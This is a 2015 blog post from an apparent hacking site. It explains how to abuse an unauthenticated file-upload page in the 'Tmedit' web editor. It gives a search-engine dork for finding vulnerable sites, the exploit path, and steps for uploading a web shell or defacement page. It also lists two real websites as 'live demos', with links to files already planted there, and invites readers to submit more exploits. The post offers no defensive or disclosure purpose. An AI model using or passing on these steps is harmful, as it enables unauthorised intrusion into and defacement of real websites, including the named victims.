Monday, 28 September 2015

"Tmedit Popuop" Deface and Shell upload vulnerability

"Tmedit Popuop" Deface and Shell upload vulnerability
zac+efron+2012.jpg (642×374)
Dork: inurl:/editor/tmedit/popups
Exploit Path : /editor/tmedit/popups/InsertFile/insert_file.php
#start :)
open Google.com or Bing.com and type this dork inurl:/editor/tmedit/popups
i got 9740 vulnrable results, now select any site from seacrh result and look for upload option on that Page now upload you shell, deface page, or anyfile there,
After uploading your  file  you'll see your uploaded file's url there, if you are not getting any perview url then goto /images directory to view your uploaded file 
for example : http://vulnrablesite.com/images/yourfilehere
Live Demo : 
http://www.arabicthailand.com/editor/tmedit/popups/insert_image_en.php
http://www.masjidklangchachengsao.com/editor/tmedit/popups/InsertFile/insert_file.php
Result : 
http://www.arabicthailand.com/images/backlinks.html
http://www.masjidklangchachengsao.com/uploadfiles/backlinks.html
*Note for Hackers [Please Sumbit your exploit here, its will publish with your name and Link]

2 comments:
Write comments
  1. This comment has been removed by a blog administrator.

    ReplyDelete
  2. This comment has been removed by a blog administrator.

    ReplyDelete

Get Updates about Latest Hacks, Exploits, Applications and Softwares. http://www.devilscafe.in/
Join Our Newsletter